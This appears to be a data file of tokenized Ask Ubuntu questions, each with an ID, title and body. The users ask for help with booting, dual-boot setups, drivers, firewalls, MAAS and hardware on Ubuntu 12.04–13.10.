353326	can i get a copy of just the changed files	i am deploying several small ubuntu 12.04 pc 's . i have one master setup , and about 30 more to go . is there some software that i can use to take a `` snapshot '' of the master , take a snapshot of one of the unconfigured ones , and give me a list or a set of files that have changed between the two ? this would be much faster than the cloning of drives , when in reality only a small subset of files are changing ... .. thanks
353327	does ubuntu work with wacom 's wireless acessory kit ( intuos5 )	i 'm interested on getting a wacom intuos5 and , while i know that it works fine using usb , i was wondering if anyone has any experience with it using the wireless kit . i 've tried to search but could n't find a straight answer to this . so , does the intuos5 with the wireless kit work on ubuntu ?
353329	install problems	i have a laptop here that use to run windows 7 . the hard drive failed , so thats that . i had an ubuntu 10.04 installed on an external usb hard drive with documents and all . i pluged it in and i was able to boot and run from it . i decided to upgrade to 12.04.3 or what ever is the number ... the upgrade was running but than during installation it just stopped and went no where . now of course , it wont boot anymore . i downloaded 12.04.3 from an other pc and put it on a usb drive but on the laptop the bios can not see valid operating system on it . i tryed to put it on a cd but there is not enough space on one cd for it . what can i do or what i doing wrong ? ps i would like to keep the documents on that external usb drive .
353331	dual booting ubuntu and windows	i just built my first pc , and i am definitely getting windows 7 ( or 8 ) however i do n't have the money to just go get windows till next week . my question is do i need to have windows first ? if i install ubuntu before windows can i still install windows after ? all i have right now is the asus system bios and i have never done this yet . really appreciate your time and answers you guys can provide for me . thanks
353332	`` package 'build-essential ' has no installation candidate '' while installing build-essential	i have tried following command and it is showing me error : sudo apt-get install build-essential results : reading package lists ... done building dependency tree reading state information ... done package build-essential is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'build-essential ' has no installation candidate
353334	will a 64 bit operating system ran as fast and smooth from a flash drive as the 32 bit version does ?	i have a bootable flash drive that i use ubuntu from . the computer i use it on is powerful enough to run a 64 bit operating system ( windows is installed ) . does the fact that it is 64 bit matter in terms of a bootable flash drive . sorry if that doesnt make sense i know that 64 bit can address more ram than 32 bit os's i guess this isnt specific to ubuntu only , should i ask somewhere else ? thanks
353338	ufw , allow from wlan to eth	i would like to use my ubuntu 12.04 notebook as a wifi hotsport to my smatphone . everything is going ok , using dnsmasq and hostapd and allowing ports 68 and 53 on ufw . but to access the web the ufw must be disabled . the connection is ok ( wifi is connected , ip properly received , dns query forwarded ... ) in the ufw full log i see : oct 3 17:09:41 ccd-7840l kernel : [ 28302.397796 ] [ ufw audit ] in=wlan1 out=eth8 mac=8c : ... :00 src=192.168.0.59 dst=74.125.234.196 len=60 tos=0x00 prec=0x00 ttl=63 id=22391 df proto=tcp spt=46279 dpt=443 window=14600 res=0x00 syn urgp=0 oct 3 17:09:41 ccd-7840l kernel : [ 28302.397841 ] [ ufw block ] in=wlan1 out=eth8 mac=8c : ... :00 src=192.168.0.59 dst=74.125.234.196 len=60 tos=0x00 prec=0x00 ttl=63 id=22391 df proto=tcp spt=46279 dpt=443 window=14600 res=0x00 syn urgp=0 then , i 've added the following rules : sudo ufw allow from 192.168.0.59 sudo ufw allow in on wlan1 from 192.168.0.48/28 but it is still blocking . i do n't know what to search for on google to fix this : )
353344	ca n't get initial boot options after installing ubuntu 13.04 x64	i have installed ubuntu 13.04 from disk and it needed to restart after completion . if i am correct , i am supposed to get a menu at boot to select various ubuntu boot options and a windows 8 boot option . i installed ubuntu with the option to have it alongside windows 8 . so far every single time i have booted my computer , it goes straight to windows 8 rather than aforementioned boot menu . i have turned off secure booting and it is set to windows uefi in my mobo bios . i have an asus z87 pro mobo , intel 4770k processor with 4600 igpu , nvidia gtx 560 , and i have windows 8 installed on my samsung ssd 250 gb and i assume ubuntu is installed on my secondary 500 gb western digital drive but it never told me specifically where it was installing anything to when i said to install alongside windows . any help would be greatly appreciated as i ca n't figure out what is wrong with the boot . i tried changing it so that the secondary hard drive had boot priority and that did n't fix anything .
353345	which usb touchpads works well in ubuntu 12.04	i would like to replace my mouse with an external usb touchpad . which usb touchpad will give me the least amount of driver headache in ubuntu 12.04 ?
353346	device for boot loader installation via usb	hello all you linux'ers . i have used ubuntu before , and really enjoyed using it , but it was set up by a friend of mine in the computer science department of our university , and we were making a dual-boot out of my netbook . now , however , there is a different sort of problem . my home-base computer is a rather old mac book pro , and instead of dual-booting that , what i want to do is make my usb a bootable copy of ubuntu . however , when i go to install it on the correct drive device , i am asked to choose `` device for boot loader installation , '' and i do not know which one to choose . i have found that it is much easier to do this initial installing on a pc , so i am using the ones that my university provides for students to use , but i do not want to break the computer 's functionality since i might have to pay for it and i a rather broke grad student . the current break down of my options : /dev/sda /dev/sda1 ntfs /dev/sdc and /dev/sdc1 fat32 the sda drives are the sata drive for my school computer and the sdc drives are the one that i want to install ubuntu to .
353347	ca n't access unallocated old internal hdd on ubuntu 12.04	i installed ubuntu 12.04 at new hdd . and now want to move my work files from old hard drive to new . i caught some trouble with this , i ca n't access this disk now . but all was correct during installation ( connection was established and worked perfect ) . here is my lsblk : nazar_art @ nazar-art-system-product-name ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 1 3,8g 0 disk └─sda1 8:1 1 3,8g 0 part /media/nazar_art/8baa-7fa6 // usb driver sdb 8:16 0 465,8g 0 disk // new hdd ├─sdb1 8:17 0 6,5g 0 part / ├─sdb2 8:18 0 1k 0 part └─sdb5 8:21 0 459,2g 0 part /home sdc 8:32 0 149,1g 0 disk // old hdd it can see my usb driver from which was installed mint . but now it does n't see old hdd . any suggestion ? update : i can only create new partition . it shows unallocated disk . i not sure that this new partition does n't damage information ... ? any suggestion ? a little bit more information : nazar_art @ nazar-desktop : ~ $ lsblk name maj : min rm size ro type mountpoint sda 8:0 0 149.1g 0 disk sdb 8:16 1 3.8g 0 disk └─sdb1 8:17 1 3.8g 0 part /media/8baa-7fa6 sdc 8:32 0 465.8g 0 disk ├─sdc1 8:33 0 464.8g 0 part / ├─sdc2 8:34 0 1k 0 part └─sdc5 8:37 0 1022m 0 part [ swap ] nazar_art @ nazar-desktop : ~ $ sudo fdisk -l /dev/sda disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00060485 device boot start end blocks id system nazar_art @ nazar-desktop : ~ $ sudo file -s /dev/sda /dev/sda : x86 boot sector , code offset 0xb8 how to solve this trouble ?
353357	printer canon mg5350 grayscale and higher resolution	i installed the driver from canon for the mg5350 but i have the following problem : by default there is only one resolution : 600dpi you can only print in color also i edit the .ppd file to add those parts *openui *resolution/output resolution : pickone *defaultresolution : 600dpi *resolution 300dpi/300 dpi : `` < < /hwresolution [ 300 300 ] > > setpagedevice '' *resolution 600dpi/600 dpi : `` < < /hwresolution [ 600 600 ] > > setpagedevice '' *resolution 1200dpi/1200 dpi : `` < < /hwresolution [ 1200 1200 ] > > setpagedevice '' *resolution 2400dpi/2400 dpi : `` < < /hwresolution [ 2400 2400 ] > > setpagedevice '' *resolution 2400x4800dpi/4800 dpi : `` < < /hwresolution [ 2400 4800 ] > > setpagedevice '' *resolution 2400x9600dpi/9600 dpi : `` < < /hwresolution [ 2400 9600 ] > > setpagedevice '' *closeui : *resolution *openui *cngrayscale/grayscale : pickone *defaultcngrayscale : false *cngrayscale false/off : `` false '' *cngrayscale true/on : `` true '' *closeui : *cngrayscale however : if i select the grayscale , it does print black and white , but the black is apparently made by mixing all the colors together instead of using the black cartridge . any idea and by the way thumbs done to those bast ... of canon who after selling millions of printers still do n't have what it takes to correctly support linux ...
353362	how to set ubuntu to reach dns server through ipv6	i have the following setup : ubuntu 13.04 with wired connection to router and debian server running in virtualbox under ubuntu ( with bridged network adapter ) . i installed and configured bind9 on debian successfully and i am able to resolve a and aaaa records when using ipv4 to reach debian from ubuntu . i am also able to resolve the same records when manually specifying ipv6 address of dns server in dig , for example : dig @ < < # ipv6 address # > > aaaa host.domain.com what i want to do now is to configure ubuntu to use ipv6 to reach the dns server in debian . i played a bit with the network manager in ubuntu and so far i was unsuccessful . what i did : i configured ipv4 tab in my eth connection to `` automatic ( dhcp ) , addresses only '' and did n't specify any nameserver . then i configured ipv6 tab to `` automatic , addresses only '' and specified the ipv6 address of debian as the nameserver . now this may seem as a correct configuration but it 's not working . the output of `` nmcli dev list iface eth0 '' command is not showing any ip6.dns lines ( note : normally when i use ipv4 to reach debian , there is a line ip4.dns with value equal to ipv4 address of debian ) . this means that ubuntu only uses ipv4 to reach the dns server . if there is no ipv4 address of dns server configured , dns is completely unreachable ( even when i configured it 's ipv6 address in the ethernet connection ) . so i guess i am missing something in the configuration . any pointers would be appreciated . again , i want to be able to reach my dns server with ipv6 by default , not ipv4 . thanks and cheers !
353364	wireless connection stopped working 12.04	it worked fine but has stopped . check settings and airplane mode is on . turn it off and it immediately turns back on . error message says wireless hardware switch is off . the wireless idiot light on above the keyboard lights up blue . computer is also can not connect with direct ethernet cable . i thought i would reinstall 12.04 but i do n't know how to do so . ron
353365	i made new login names when i upgraded now i ca n't see files on external drive	upgrade from 10.04 to 12.04 was successful and i thought everything was good . i decided to do a complete wipe and start from scratch so i off loaded everything to an external drive . i thought i was safe . not thinking when i installed 12.0.4 i created a new admin user and a new user for myself . i wanted to use aliases instead of my name in the computer . today i reconnected the external drive to access a spreadsheet . i did get a message that said some files were not readable . also my user file could only see some music folders i created for ripping lps to cds but not my data files . also the admin user could not even see the external drive . i thought a file was a file on an external drive and didnât even think about permissions associated to a login . did i shoot myself in the foot when i created new user names ? is there anyway i can access my old files .
353370	installing ubuntu 13.04 ( 64-bit ) virtual machine with vagrant on os x provides only 4 gb disk space	i used the vagrant image for ubuntu 13.04 64-bit from http : //cloud-images.ubuntu.com/vagrant/raring/current/raring-server-cloudimg-amd64-vagrant-disk1.box to create a new virtual machine on my macbook ( 10.8 ) and can successfully ssh to it . the problem is that though virtualbox shows the size of the virtual machine 's hard drive to be 40 gb ( dynamic ) , df-h command executed within the virtual machine shows that /dev/sda1 has only 4gb , which is not enough for my needs : /dev/sda1 4.0g 970m 2.8g 26 % / how can i ensure that my the vagrant ubuntu vm has enough space ( e.g . 20gb ) on its sda1 partition ?
353374	i 've tried 3 different methods of installing ubuntu 13.04 alongside windows 8 , with no avail !	1 ) i went into the uefi bios and changed the settings to get it to boot from cd ... after doing so and restarting , i get a menu with 4 options : gnu grub v2.00 13ubuntu3 1 ) try ubuntu without installing 2 ) install ubuntu 3 ) oem install ( for manufacturers ) 4 ) check disk for defects after trying the first two options individually , i get a blank screen and the dvdrom stops spinning 2 ) i opened the iso image in windows , installed wubi , and restarted . i get the following error : missing file : wubildr.mbr enter=choose os i hit enter , and i get a menu to choose windows 8 or ubuntu , i choose ubuntu and it goes back to the same error screen . i take out the disk , restart into windows 8 , and uninstall wubi . 3 ) i installed it on oracle 's virtual machine , i can demo it on there , but every time i go to install it , it crashes . so i 'm left thinking maybe i should try a different distrobution ? can anyone give me the slightest advice please ?
353376	run mono application on startup ubuntu	i need run a c # windows forms application ( mono app ) on ubuntu startup , then i trying use upstart . i run this application fine manually , but when i use the upstart script , as follow : description `` indsys andon '' start on runlevel [ 2345 ] stop on runlevel [ 016 ] setuid nobody setgid nogroup respawn console log script /usr/bin/mono /usr/lib/indsysandon/indsysandon.exe `` $ @ '' end script in indsysandon.exe.log the error message appears : a unhanled exception : system.typeinitializationexception : an exception was throw parameter name : display ... when i use the script as how do i add my mono program to the startup ? , so , in indsys.exe.log the error messages is : run-detectors : unable to find an interpreter for /usr/lib/indsysandon/indsysandon.exe i do n't know rights , but i think that my need is very simple . it 's really necessary to use upstart ? i also tried unsuccessfully by rc.local , inserting : /usr/bin/mono /usr/lib/indsysandon/indsysandon.exe somebody help me , please . thanks ,
353378	software-center crashed ; will not re-install after attempted fix	i 'm stumped . on my system , software-center was crashing within 2 seconds of execution . i tried to resolve the issue by running : sudo apt-get remove -- purge software-center sudo apt-get install software-center unfortunately , the install fails . i get this error : sudo apt-get install software-centerreading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : software-center : depends : python-gi ( > = 3.4.0-1ubuntu0.1 ) but it is not going to be installed depends : python-gi-cairo but it is not going to be installed depends : python-aptdaemon ( > = 0.40 ) but it is not going to be installed depends : python-aptdaemon.gtk3widgets but it is not going to be installed depends : oneconf ( > = 0.2.6 ) but it is not going to be installed depends : python-oneconf ( > = 0.3 ) but it is not going to be installed or oneconf ( < 0.3 ) but it is not going to be installed recommends : sessioninstaller but it is not going to be installed e : unable to correct problems , you have held broken packages . in desperation , i tried apt-get build-deps , but this also failed . sudo apt-get build-dep python-gi python-gi-cairo python-aptdaemon.gtk3widgets oneconf python-oneconf oneconf sessioninstaller reading package lists ... done building dependency tree reading state information ... done picking 'pygobject ' as source package instead of 'python-gi' the following packages have unmet dependencies : libcairo2-dev : depends : libfontconfig1-dev ( > = 2.2.95 ) but it is not going to be installed libglib2.0-dev : depends : libglib2.0-0 ( = 2.36.0-1ubuntu2 ) but 2.36.3-0ubuntu1~raring1 is to be installed depends : libglib2.0-bin ( = 2.36.0-1ubuntu2 ) e : build-dependencies for python-gi could not be satisfied . any ideas ?
353381	ubuntu does not boot up on my pc , whether installed or from a live cd/usb . help ?	my computer parts : gigabyte z77x-d3h rev1.1 intel i5-3570k geforce gtx 660/igpu corsair lp 8gb ram a few days ago , after i had installed a new bios , my ubuntu install just stopped booting . it would start , but then stop after a few rotations of the 'loading ' circles . i thought i could just fix it by booting up a live usb and running boot-repair , but on starting the live usb , the same thing happened . i went into the bios and changed all the uefi settings and made absolutely sure that uefi was completely disabled , as per when i installed both windows and ubuntu . i tried re-flashing the bios and clearing the dmi data pool , removing the gpu and checking to see if it was a driver issue , checking every component that i could , even memorytesting even though windows 7 still booted up correctly . i tried booting different oses , such as fedora and ubuntu 12.10/13.04 , and debian , but the only os that worked apart from windows 7 was ubuntu 10.04 , but understandably ( i think ) i do n't want it . i know it ca n't be the usb/hd/cds i 'm booting off as i tried many different devices and none worked with newer linux kernels . i 'm also pretty sure that its not grub , seeing as grub 2 is used in 10.04 as well as 12.04 etc . i 'm not a total 'noob ' with ubuntu consoles but i 'm still not good , so please try to keep the help simple . thanks in advance . -- edit -- i have finally found the issue : it was not a hardware issue or bios problem , but the uefi options in the bios that prevented any new version of linux stop booting , even if you chose the legacy boot option in the boot options . all i had to do was switch to 'legacy only ' in the bios settings and they now boot . i still am stumped by why uefi is supported by 10.04 and possibly other older distros .
353382	service vs. initctl	why are some deamons run out of service and some out of initctl ? do both tools do the same thing and it is just a matter of personal preference of the user what they will use ? e.g . sudo service -- status-all vs sudo initctl list in my particular instance cron runs out of initctl , and ssh runs out of service . but on fedora , for example , both of those will be in systemctl .
353383	cpu frequency scaling issue - scaling_max_freq wrong	i have the an issue on my elitebook core 2 duo t9600 , the scaling stops to work after few seconds of high load and get stuck at 800mhz . temperature is around 50-60째c for both cores , bios_limit is reporting the correct max speed 2534000 ( 2.53ghz ) . the only wrong information i can find is in */sys/devices/system/cpu/cpu0/cpufreq/scaling_max_freq* which shows 1520400 rather than 2534000 but anyway , the cpu never goes beyond 800mhz . it appears either on ac and on battery . my system : ubuntu raring 13.04 kernel 3.8.0-19-generic x86-64 is there a way to disable completely the scaling . i do n't have any cpu freq manager running in userland .
353384	how to dynamically change configuration of a running xserver ?	i 'm running ubuntu 12.04.3 on intel 's hd4000 gpu . while xserver is running , i would like to : add a new dummy screen to a running xserver ( existing session , no dm involved ) set resolution of display inside newly created screen set the position of that screen to be right-of existing screen
353385	nautilus hotkey file rewrites every time	i 've tried to return back backspace button function as it described here . but file ~/.config/nautilus/accels rewrites every time nautilus starts . it looks quite logical : there is string in the begining ; this file is an automated accelerator map dump but where is actual config which dumping there ?
353386	gateway m-73 brightness	i can not get my brightness keys to work . the combo fn+up and fn+down are supposed to control the brightness . on a fresh install , they turn the slider down but do not change the brightness . so i added acpi_backlight=vendor to grub and that allows me to change the brightness , but when i press the fn combo , the screen turns off . i tried the windows 2012 trick to grub but that did not work . i had some luck follwing this http : //ubuntuforums.org/archive/index.php/t-2158864.html but when it comes to the last part of making the script to tie them to the key , it does not work ; the screen still turns black ... i am stuck here and open to any suggestions .
353387	switching workspaces changes active window in previous workspace	only a minor annoyance here , yet still hoping to find some way to fix it . i like the idea of workspaces in unity , but i 've discovered when i switch workspaces , then switch back , unity does not remember my last active window . at least , not if i have multiple instances of the same application open . this leaves me being confused as to what is active and often typing in the wrong console . anyone have any idea how unity decides which window to make active when switching workspaces and then any idea how to reconfigure its default behavior ?
353388	how to have sub-layouts of a specific keyboard layout in ubuntu ?	in windows it is possible to arrange your keyboard layouts in 2 levels as following : 1 . english : 1.1 . english us 1.2 . english uk 2 . german and you are able to : a ) switch directly between 1. and 2. using alt+shift . b ) switch directly between 1.1. and 1.2. using ctrl+shift ( when 1. is chosen ) . how can i arrange the same setup in ubuntu if is it possible ? thank you for your help in advance !
353389	getting grub rescue on boot , but can get to grub via 'bios '	i 'm pretty rubbish when it comes to understanding partitions and the ubuntu boot process . i have recently tried using the boot-repair application to re-instate my dual boot menu after installing ubuntu 12.04 next to windows 8 . unfortunately after doing this , i get grub rescue : ( . i have a log here that boot repair produced http : //paste.ubuntu.com/6190172/ . i have a dell inspiron 15 and if on startup i press f12 , i can choose ubuntu or windows to boot from . choosing 'ubuntu ' gives me the multi-select that i would expect . how can i resolve this ?
353390	having windows 8 boot from ubuntu menu issues	im very new with this dual booting stuff . but i just installed ubuntu 12.04.3 lts onto an un allocated 150gb space that i shrank from my d : drive . when i boot the computer up it goes into the ubuntu menu and lets me select : ubuntu generic , ubuntu recovery , previous versions of linux , windows 8 recovery , windows 8 ( loader ) when i select windows 8 ( loader ) and windows 8 recovery selection it gives me an error `` error can not locate drive map '' and after pressing the enter key it goes back to the menu with all the options to choose from . my friend said that i should just use boot-repair from the terminal and just repair it there ... but he has let me down in the past so i just want to make sure that would actually help out more than do harm . it would be greatly appreciated if someone could help me out ! boot-repair http : //paste.ubuntu.com/6190163/ i have a asus k55n preloaded with windows 8 and f2 is bios when i disable `` secure boot '' from the bios ubuntu will not load , but when i enable `` secure boot '' it boots ubuntu right up .
353394	pre-installed apps and unity dash are gone	so i 'm a newbie to ubuntu..and i have a huge miss happening on my laptop right now pre-installed apps that came with ubuntu 13.04 were gone ( i think something happened while updating them ) tweaks and apps like terminal ubuntu software center are gone too so i tried to restart the pc thinking it will solve the problem but it gets worse when now i ca n't even find the unity dash or the bar on the top..i managed to make a new folder on the desktop and choose a random file and chose to run it with chromium that 's and that 's how i reached the website ... .now what do i do ?
353397	bumblee ppa failed to fetch on ubuntu 13.10	when i attempt an update , i ca n't pull down the bumblebee ppa for saucy . w : failed to fetch http : //ppa.launchpad.net/bumblebee/stable/ubuntu/dists/saucy/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/bumblebee/stable/ubuntu/dists/saucy/main/binary-i386/packages 404 not found even after following the instructions here to a tee . i ca n't seem to find the ppa directory in any documentation to cross check . i am running ubuntu 13.10 with an nvidia geforce gt 750m .
353399	internal hdd mounting in /media as usbhd-sdc3	i 'm trying to work through an issue with one of my hhds getting flagged as having serious errors at boot . smartcontrol and fsck report no errors on the drive . boot.log reports that the drive was busy at boot and unable to be checked the only thing i find strange is that my hdd which is mounted at /media2 has also been mounted in /media as usbhd-sdc3 can anybody explain why it 's getting mounted here as well ? or how to stop it mounting there i 'm running ubuntu 13.04 fstab # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=f7767ada-f636-4983-9888-9491484ec5c4 / ext4 errors=remount-ro 0 1 # /media was on /dev/sdb1 during installation uuid=b52ed08d-2eca-425f-ac80-3fcfd781b0f8 /media ext4 defaults 0 2 # /media2 was on /dev/sdc3 during installation uuid=34dc11ad-bf6d-4874-8ae6-6aaa5eade523 /media2 ext4 defaults 0 2 # swap was on /dev/sdc1 during installation uuid=ac801b6f-ed4a-4f21-bf86-40e8ce8ed2c2 none swap sw 0 0 /media mounts xbmc @ xbmc : /media $ ls usbhd-sdc1 usbhd-sdc2 usbhd-sdc3 wdred
353407	12.04 [ unknown display ] unknown adapter after plugging in second monitor	what i am working with first i guess ... video card- amd radeon hd 7790 2gb gddr5 motherboard- gigabyte ga-f2a85x-d3h ok , so i have the one monitor plugged into the motherboard and the other plugged into the graphics card . originally the bios settings were set up so that under peripherals , the primary video device was the nb pcie slot video . however , the monitor plugged into the mobo would not turn on , nor would the amd catalyst control center even recognize it . i tried changing the integrated graphics to force , but that did n't fix it . when i changed the setting back to igd , the monitor plugged into the mobo works , but the one plugged into the graphics card does n't . however , when i changed that , in the amd catalyst control center , it recognizes that something is plugged in , but only says [ unknown display ] unknown adapter . i have tried uninstalling and reinstalling the drivers several times now , as well as trying the easy fix of . i guess my question is is it possible to run both the mobo monitor and the one plugged into the graphics card , since it does recognize that a monitor is plugged in ? and if so , how ?
353408	dell inspiron 1525	looking to possibly install ubuntu on this but have heard of problems with only 2 gigs of ram . would this laptop with a 2 ghz dual core processor , 2 gigs of ram , run smoothly , or at least better than vista . thanks
353409	netgear n900 wnda4100 series and rfkill	i have the linux driver installed for the wnda4100 and it was working just fine with my desk top a few weeks back . i have n't been using my desktop lately and when i came back it seems to be disabled . i ca n't seem to get the command quite right in rfkill in my terminal to make sure it 's switch is enabled . i 'm currently running ubuntu studio amd64 13.04 . but it needs it 's update pretty badly .
353411	stuck on ubuntu purple install page	i just built my first pc today and i am trying to boot into ubuntu . i do not have windows . it boots up but sits at the purple screen with the dots that go from orange to white . it has been sitting here for awhile . i checked to make sure the files were correctly burned and it looks like they were . i used a dvd-r and burned it using windows on another pc . anyone have any ideas , how long should it realistically take to get past this screen . i 'm not really sure where i went wrong . after pressing the arrow i see a bunch of bus error , mountall : failed adding 'diversion of /usr/bin/bluetooth-applet to usr/bin/bluetooth-applet.orig by casper' mountall event failed ] 2046.677600 ] end_request i/o error , dev sr0 sector 158960 this repeats a bunch with varying numbers and codes . i really do n't know what to do .
353421	how to boot ubuntu after installing on a partition	i need to figure out how to boot ubuntu when i restart my computer , i think i do n't have the grub2 bootloader installed on my first partition . i need to figure out how to switch win 7x64 to the grub2 bootloader , preferably from windows itself . i had windows already installed on my computer , i partition it for ubuntu , then booted from a usb drive and installed ubuntu onto the partition . after ubuntu failed to reboot my computer ( ubuntu has a bug where it can not shutdown for me , my computer is a lenovo b570 ) i had to force it to shut down , everything installed correctly i think but i need to find out how to boot into ubuntu from the partition . 1 do i need to reinstall ubuntu and redo the partition ? 2 do i need to just switch my bootloader ? 3 if i need to switch my bootloader , how ? i am extremely new to this and i do n't want to have a headache for my first test .
353426	region controller does not know whether any boot images have been imported	update : with help from canonical i was able to figure out something . the maas-import-pxe-files is getting stuck when downloading ephemeral images from ubuntu . i isolated the following : wget -v xhttps : //maas.ubuntu.com/images/query/precise/ephemeral/released-dl.current.txt -o /tmp/aaa.tmp -- 2013-10-04 17:12:57 -- https : //maas.ubuntu.com/images/query/precise/ephemeral/released-dl.current.txt resolving maas.ubuntu.com ( maas.ubuntu.com ) ... 91.189.90.19 , 91.189.89.122 connecting to maas.ubuntu.com ( maas.ubuntu.com ) |91.189.90.19|:443 ... failed : connection timed out . connecting to maas.ubuntu.com ( maas.ubuntu.com ) |91.189.89.122|:443 ... failed : connection timed out . despite the fact that i can telnet www.google.com 80 , i ca n't wget . this is happening because my lab has a proxy . to work around this i had to export http_proxy= proxy addr export https_proxy= proxy addr after that , note that sudo maas-import-pxe-files still does n't work , but sudo bash maas-import-pxe-files does . i 'm not sure yet whether this will also fix the problem reported in the maas gui , but will update as soon as the install is complete . original question i 've setup maas with region and cluster controller in same node . i can log into the gui , and was able to create the superuser . there are two problems , which might be manifestation of the same issue . 1 ) the yellow bar on the page is now showing this message : the region controller does not know whether any boot images have been imported yet . if this message does not disappear in 5 minutes , there may be a communication problem between the region worker process and the region controller . check the region worker 's logs for signs that it was unable to report to the maas api . 2 ) when running : sudo maas-import-pxe-files i get this output : $ sudo /usr/sbin/maas-import-pxe-files downloading to temporary location /tmp/tmp.ritldmoaql . /tmp/tmp.ritldmoaql /var/log/maas 2013-10-03 11:14:46 url : xhttp : //archive.ubuntu.com/ubuntu//dists/precise/main/installer-amd64/current/images/netboot/ubuntu-installer/amd64//linux [ 4965840/4965840 ] - > `` linux '' > [ 1 ] 2013-10-03 11:14:48 url : xhttp : //archive.ubuntu.com/ubuntu//dists/precise/main/installer- > amd64/current/images/netboot/ubuntu-installer/amd64//initrd.gz [ 17446386/17446386 ] - > `` initrd.gz '' [ 1 ] 2013-10-03 11:14:49 url : xhttp : //archive.ubuntu.com/ubuntu//dists/quantal/main/installer- > amd64/current/images/netboot/ubuntu-installer/amd64//linux [ 5130968/5130968 ] - > `` linux '' > [ 1 ] 2013-10-03 11:14:51 url : xhttp : //archive.ubuntu.com/ubuntu//dists/quantal/main/installer- > amd64/current/images/netboot/ubuntu-installer/amd64//initrd.gz [ 18668122/18668122 ] - > > > `` initrd.gz '' [ 1 ] 2013-10-03 11:14:52 url : xhttp : //archive.ubuntu.com/ubuntu//dists/precise/main/installer- > i386/current/images/netboot/ubuntu-installer/i386//linux [ 5015840/5015840 ] - > `` linux '' [ 1 ] 2013-10-03 11:14:54 url : xhttp : //archive.ubuntu.com/ubuntu//dists/precise/main/installer-i386/current/images/netboot/ubuntu-installer/i386//initrd.gz [ 15977428/15977428 ] - > `` initrd.gz '' [ 1 ] 2013-10-03 11:14:55 url : xhttp : //archive.ubuntu.com/ubuntu//dists/quantal/main/installer-i386/current/images/netboot/ubuntu-installer/i386//linux [ 5171760/5171760 ] - > `` linux '' [ 1 ] 2013-10-03 11:14:57 url : xhttp : //archive.ubuntu.com/ubuntu//dists/quantal/main/installer-i386/current/images/netboot/ubuntu-installer/i386//initrd.gz [ 17086667/17086667 ] - > `` initrd.gz '' [ 1 ] 2013-10-03 11:14:58 url : xhttp : //ports.ubuntu.com/ubuntu-ports//dists/precise-updates/main/installer-armhf/current/images/highbank/netboot//vmlinuz [ 2978672/2978672 ] - '' vmlinuz '' [ 1 ] 2013-10-03 11:14:58 url : xhttp : //ports.ubuntu.com/ubuntu-ports//dists/precise-updates/main/installer-armhf/current/images/highbank/netboot//initrd.gz [ 4958070/4958070 ] - > `` initrd.gz '' [ 1 ] 2013-10-03 11:14:59 url : xhttp : //ports.ubuntu.com/ubuntu-ports//dists/quantal/main/installer-armhf/current/images/highbank/netboot//vmlinuz [ 3738504/3738504 ] - > `` vmlinuz '' [ 1 ] 2013-10-03 11:15:00 url : xhttp : //ports.ubuntu.com/ubuntu-ports//dists/quantal/main/installer-armhf/current/images/highbank/netboot//initrd.gz [ 6213909/6213909 ] - > `` initrd.gz '' [ 1 ] /var/log/maas ( i had to prepend an 'x ' in front of http in the posting because i 'm not allowed to post more than two links ) the command stay stuck at this point without returning the prompt . note that : uname -a linux myhost 3.5.0-23-generic # 35~precise1-ubuntu smp fri jan 25 17:13:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux i did find bug 1067558 and 1070318 but i ca n't figure out how to go past this . any help is appreciated .
353428	what files do i need for my wireless card ?	i have a linksys wmp54g wireless pci card in my computer . i have internet access in windows so i can easily download any files i need to get it to work , but the card does n't work without additional drivers . i do n't know what files i 'll need or what to do with them when i do . i 've already downloaded the ndis wrapper . i 'm running a dual boot of ubuntu 12.10 and windows 8 . my computer has two hdds and supports 64 bit software . what should i download and what should i do with those files ?
353431	rhythmbox wo n't play certain songs	for the most part rhythmbox works fine . however , there is one song in my library that it refuses to play , or add to any playlist . vlc will take it , and audacity will as well , but rhythmbox will just exit silently . running with -d yields a similar output to the other non-broken mp3s . for what it 's worth , i 'm running rhythmbox 2.96 with ubuntu 12.04 help ?
353432	ubuntu wo n't boot off of flash drive	i boot linux from my flash drive , but i already installed it on my laptop ... . sometimes i plug in my flash drive and boot and get all my usual files but it always asks me if i want to install linux even though i already have . i decided to try using it without my flash drive and none of my files are there . does anybody know how to get that install linux window to go away ?
353443	ca n't run ubuntu off flash drive	i recently used the universal usb installer to install ubuntu 12.04.3 onto a formatted 16 gb flash drive . once the install was complete , i tried rebooting the machine with the flash drive in my pc , but it went straight to windows . i tried pressing f10 to change boot options , but under removable , it says no bootable device found . any suggestions ?
353444	at 10 percent brightness my screen is at 100 %	i have kubuntu 13.04 installed on an hp envy dv7 with the dual graphics chipsets intel 4000 and nvidia 630m . and when i try to reduce my screen brightness it doesn´t actually go down until it reaches 10 % . i´m running the standard nouveau drivers , no proprietary drivers .
353447	virtual machine do n't run	when i download vm i cant run any os and appear c贸digo de resultado : ns_error_failure ( 0x80004005 ) componente : machine interface : imachine { 5eaa9319-62fc-4b0a-843c-0cb1940f8a91 } after apear kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . and now ?
353448	usb dvb tuners not loading on start	i have 3x usb tv tuners they do not seem to load when my computer starts however work fine when i unplug them and replug which is causing issue with mythtv not being able to record
